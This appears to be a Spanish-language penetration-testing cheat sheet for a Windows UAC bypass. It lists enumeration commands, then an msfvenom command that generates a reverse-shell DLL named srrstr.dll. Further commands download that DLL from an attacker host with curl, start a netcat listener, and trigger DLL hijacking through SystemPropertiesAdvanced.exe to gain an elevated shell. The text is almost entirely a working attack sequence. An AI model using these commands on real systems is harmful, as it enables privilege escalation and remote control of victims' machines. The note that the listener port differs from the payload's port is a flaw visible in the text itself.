User Account Control

Recursos

Chequear usuario actual

whoami /user

Confirmar si el usuario es miembro del grupo de administradores

net localgroup administrators

Revisar privilegios de usuario

whoami /priv

Confirmar si el UAC está Enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Chequear el nivel del UAC

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

Chequear la versión de Windows

[environment]::OSVersion.Version

Revisar la variable de entorno PATH

cmd /c echo %PATH%

Generar archivo malicioso srrstr.dll para obtener una reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll

Levantar un servidor con Python en la máquina atacante

python3 -m http.server

Descargar el archivo DLL

curl http://<ATTACKER-IP>:<PORT>/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"

Ponerse en escucha en la máquina atacante

nc -lnvp 1111

Testear la conexión

rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll

Verificar que se tienen permisos de usuario normal

whoami /priv

Asegurarse de que se todas las instancias del proceso rundll32 se hayan finalizado

tasklist /svc | findstr "rundll32"
taskkill /PID <PID> /F

Volver a ponerse en escucha en la máquina atacante

nc -lnvp 1111

Ejecutar la versión de 32-bit de SystemPropertiesAdvanced.exe desde la máquina víctima

C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

Verificar que se obtuvo una shell con privilegios elevados

whoami /priv

Last updated 4 months ago